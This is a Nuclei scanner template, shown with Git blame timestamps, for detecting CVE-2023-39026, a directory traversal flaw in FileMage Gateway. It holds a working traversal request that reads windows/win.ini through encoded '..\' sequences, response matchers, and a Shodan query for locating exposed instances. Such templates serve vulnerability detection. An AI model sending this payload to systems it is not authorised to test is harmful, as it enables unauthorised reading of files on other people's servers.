nuclei-templates/http/cves/2023/CVE-2023-39026.yaml

44 lines
1.6 KiB
YAML
Raw Normal View History

2023-08-24 05:40:31 +00:00
id: CVE-2023-39026
info:
name: FileMage Gateway - Directory Traversal
author: DhiyaneshDk
severity: high
description: |
Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.
2023-09-06 11:43:37 +00:00
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in FileMage Gateway.
2023-08-24 05:40:31 +00:00
reference:
- https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html
- https://securityonline.info/cve-2023-39026-filemage-gateway-directory-traversal-vulnerability/
2023-08-24 17:45:24 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-39026
2023-08-31 11:46:18 +00:00
- https://www.filemage.io/docs/updates.html#change-log
2023-08-24 17:45:24 +00:00
classification:
2023-08-31 11:46:18 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
2023-08-24 17:45:24 +00:00
cve-id: CVE-2023-39026
2023-08-31 11:46:18 +00:00
cwe-id: CWE-22
epss-score: 0.01308
epss-percentile: 0.84224
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:filemage:filemage:*:*:*:*:*:*:*:*
2023-08-24 05:40:31 +00:00
metadata:
2023-08-24 17:45:24 +00:00
verified: true
2023-09-06 11:43:37 +00:00
max-request: 1
2023-08-31 11:46:18 +00:00
vendor: filemage
product: filemage
2023-09-06 11:43:37 +00:00
shodan-query: title:"FileMage"
2023-08-24 17:45:24 +00:00
tags: cve,cve2023,lfi,filemage
2023-08-24 05:40:31 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"
matchers:
- type: dsl
dsl:
2023-08-24 17:45:24 +00:00
- "contains_all(body,'bit app support','extensions','fonts')"
2023-08-24 05:40:31 +00:00
- "contains(content_type, 'text/plain')"
- "status_code == 200"
condition: and